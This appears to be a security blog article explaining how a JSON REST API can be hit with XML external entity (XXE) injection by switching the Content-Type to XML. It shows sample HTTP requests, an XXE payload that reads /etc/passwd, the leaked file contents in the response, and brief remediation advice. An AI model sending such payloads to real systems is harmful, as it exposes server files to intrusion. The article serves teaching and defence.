How JSON Rest API are prone to XML external entity injections?

As we know that REST and SOAP technology are responsible to handle and carry data in web services from client to server. Based on the requirement, the server parses or converted the requested data into its own format to process the request further. Developer implements either of these two REST API and SOAP services based the requirement which is completely different in nature and but performs same responsibility. 

How it is possible and what will happen?

It is only possible when server allows or fails to restrict the parsing capabilities, for example when JSON data are converted into XML DTD type data, server allows parser to convert or server is incapable to restrict the conversion to XML data format that may vulnerable to XXE or some sensitive data will get exposed like password file or sensitive configuration file of server. This because the server implements proper prevention for JSON request but failed to understand the XML DTD request data which in turn prone to XXE attack. 

Basic JSON Request:

Take an example that an application (testing.example.com) supports JSON for web services calls to handle the request for searching details for the requested username.

  • HTTP Request: Requested traffic in JSON format.

POST /findname HTTP/1.1
Host: testing.example.com
Accept: application/json
Content-Type: application/json
Content-Length: 38
{"search":"name","value":"TCS"}

  • HTTP Response: Throws an error as no data was found for that particular requested parameter:

HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 43
{"error": "no search found for TCS"}
 

Attack Scenario: 

1. Now change the Content-Type: REST API value to XML format type.

HTTP Request:
POST /findname HTTP/1.1
Host: testing.example.com
Accept: application/json
Content-Type: application/xml
Content-Length: 38

{"search":"name","value":"TCS"}

HTTP Response:

In this traffic response we will observe that server supports XML format but body contains JSON data format in the requested traffic. As there is a mismatch in the format, thus it throws an internal 500 server error.

HTTP/1.1 500 Internal Server Error
Content-Type: application/json
Content-Length: 127

{"errors":{"errorMessage":"org.xml.sax.SAXParseException: XML document structures must start and end within the same entity."}}

2, Now requested traffic contains similar parameters in the form of DTD data type XML format instead of JSON data format.

HTTP Request:

POST /findname HTTP/1.1
Host: testing.example.com
Accept: application/json
Content-Type: application/xml
Content-Length: 288

<? xml version="1.0" encoding="UTF-8”?>
<! DOCTYPE testrest [<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<root>
<search>name</search>
<value>&xxe;</value>
</root>

HTTP Response:

HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 2467

{"error": " no search found for root:x:0:0:root:/root:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/false
tc:x:1001:50:Linux%20User,,,:/home/tc:/bin/sh
play:x:100:65534:Linux%20User,,,:/opt/play-2.1.3/xxe/:/bin/false
mysql:x:101:65534:Linux%20User,,,:/home/mysql:/bin/false…}

Remediation:

  1. Server must restrict to REST API data type.
  2. The server must validate while parsing the other data type format of the external resource.
  3. Disallow DOCTYPE tag and restrict the access to its sensitive data.

Authored By - Saurav Samanta
TCS Cyber Security Practice

Rate this article: 
Average: 5 (119 votes)
Article category: